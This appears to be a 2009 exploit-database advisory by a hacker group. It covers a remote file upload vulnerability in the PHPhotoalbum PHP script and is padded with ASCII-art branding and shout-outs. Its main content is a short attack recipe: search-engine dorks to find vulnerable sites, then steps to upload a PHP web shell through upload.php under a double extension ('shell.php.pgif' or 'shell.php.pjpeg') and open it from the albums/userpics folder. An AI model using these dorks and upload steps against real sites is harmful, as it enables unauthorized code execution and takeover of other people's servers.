[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHPhotoalbum Remote File Upload Vulnerability
# Published : 2009-12-21
# Author : wlhaan hacker
# Previous Title : Social Web CMS <= Beta 2 Multiple Vulnerabilities
# Next Title : VideoCMS SQL Injection Vulnerability
|| || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( .
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' __ /'__` / __ /'__` / ___ |
| /_, ___ /_/_L ___ ,_/ / _ __ __/ |
| /_/ /' _ ` / /_/__<_ /'___ / /`'__ ___`` |
| / / / L / __/ _ _ / / L |
| _ _ __ ____/ ____\ __\ ____/ _ ____/ |
| /_//_//_/ _ /___/ /____/ /__/ /___/ /_/ /___/ |
| ____/ >> team wlhaan hacker |
| /___/ |
| |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
==========================================================================
~ Script Name : PHPhotoalbum)
~ Language : php
~
~ email: iit@hotmail.com
~
============================================================
Dork : Powered By PHPhotoalbum
or
inurl:"PHPhotoalbum-upload.php"
============================================================
Exploit :
http://{server/script path/upload.php
chang shell
shell.php.pgif
or
shell.php.pjpeg
go to shell
http://server/script path/albums/userpics/shell.php.pgif
============================================================
thank you for
shooq hacker
============================================================
www.sa-hacker.com/vb
============================================================